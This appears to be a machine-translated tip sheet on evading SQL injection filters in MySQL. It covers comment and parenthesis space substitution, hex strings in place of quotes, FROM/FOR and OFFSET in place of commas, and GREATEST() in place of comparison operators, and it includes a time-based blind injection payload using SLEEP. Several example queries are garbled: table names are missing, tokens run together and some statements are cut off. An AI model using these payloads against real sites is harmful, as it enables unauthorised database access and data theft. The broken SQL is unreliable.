SQL Injection Bypass Tips

1. Bypass spaces (Comment breaks/* */):

The most basic way to bypass, replace spaces with comments:

/*  */

2. Parentheses around spaces:

If the spaces are filtered, the parentheses are not filtered and can be bypassed with parentheses.

In MySQL, parentheses are used to surround the subquery. Therefore, any statement that can calculate the result can be enclosed in parentheses. Instead of the two ends of the brackets, there can be no extra space.

For example:

Select (User ())  from where (1=1) and (2=2)

This filtering method is often used for time based blinds, such as:

id=1%27and (Sleep (Mid (Database () from (1) for (1)) =109)) %

(The from for is a comma-bypass below it will have)

The above method has neither a comma nor a space. Guess the first character of the database () ASCII code is 109, if the load delay.

3. Quote bypass ( using hex ):

Where quotation marks are used is usually in the final where clause. As in the following SQL statement, this is a simple statement that is used to select all the fields in the Users table:

Select column_name from  where table_name="users"

At this point, if the quotation marks are filtered, then the above where clause cannot be used. Then it is necessary to use hex to deal with this problem.
usersThe hexadecimal string is 7573657273 . Then the last SQL statement becomes:

Select column_name from  where table_name=0x7573657273

4. Comma bypass ( using from or offset):

When using the blinds, you need to use the substr (), Mid (), limit. These clause methods all need to use commas. For substr () and mid () these two methods can be from to resolved in a way that:

Select substr (Database (0from1for1); Select Mid (Database (0from1for1);

For those that limit can be used offset to bypass:

Select  from 0,1# is equivalent to the following SQL statement Selectfrom10

5. Compare symbol (<>) bypass ( using Greatest ()):

Similarly, when using the blind, you need to use a comparison operator to find a binary search. If you cannot use the comparison operator, then you need to use it to greatest bypass it.
The most common SQL statement for a blind:

Select  from where id=1 and ASCII (SUBSTR (Database (),0,1)) >

At this point, if the comparison operator is filtered, the above blind statement is not available, then it can be used instead of the greatest comparison operator. Greatest (N1,n2,n3,...) function return input parameter (n1,n2,n3,...) The maximum value.
Then the above SQL statement can use greatest a clause that becomes the following:

Select  from where id=1 and Greatest (ASCII (SUBSTR (Database (),0,1)) =  -

SQL injection Bypass technique